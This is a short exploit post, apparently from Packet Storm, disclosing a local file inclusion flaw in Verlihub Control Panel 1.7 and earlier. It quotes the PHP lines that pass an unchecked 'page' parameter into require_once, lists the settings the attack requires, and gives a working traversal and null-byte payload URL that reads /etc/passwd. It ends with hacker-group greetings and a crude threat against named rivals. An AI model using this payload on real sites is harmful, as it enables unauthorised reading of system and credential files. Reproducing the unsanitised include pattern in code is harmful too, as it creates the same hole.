Verlihub Control Panel versions 1.7 and below suffer from a local file inclusion vulnerability.
dcd9c373e969058ec12e43100b2fa11d61db6b6e1284b692a04dbd2cf0b3df29#####################################################################################
#Verlihub Control Panel v 1.7 PHP 4.x Local File Inclusion
#http://vhcp.verlihub- project.org/
#
#Bug Found By Methodman
#From TEAMELITE <-> dchub.nemesis.te-home.net:4120
#####################################################################################
#Bug:
#Line: 27 - ini_set("magic_quotes_gpc","1"); ............................ Line: 71 - $page_name =
#isset($_GET['page']) ? $_GET['page'] : (!isset($_SESSION['verliadmin']) ? 'start' : 'start'); .....Line: 145 - #require_once("./pages/$page_name.php");
#####################################################################################
#NEED: magic_quotes=OFF
#
#NEED: disable_functions=ini_set
#####################################################################################
#
#Exploit:
#
#http://site/path/?page=../../../../../../../../etc/passwd%00
#
#
#####################################################################################
#
#Gr33tZ: To All Members Of TEAMELITE
# Ashura,Lord_Zero,Meka][Meka,Ne0
# AND
# My Friend Elekt From Antichat.
#####################################################################################
#My 3N3mY ?: ...Mish and Dark If Y0u FUck w1t me,I'll pUt my f00t in y0ur aSs !...
#####################################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed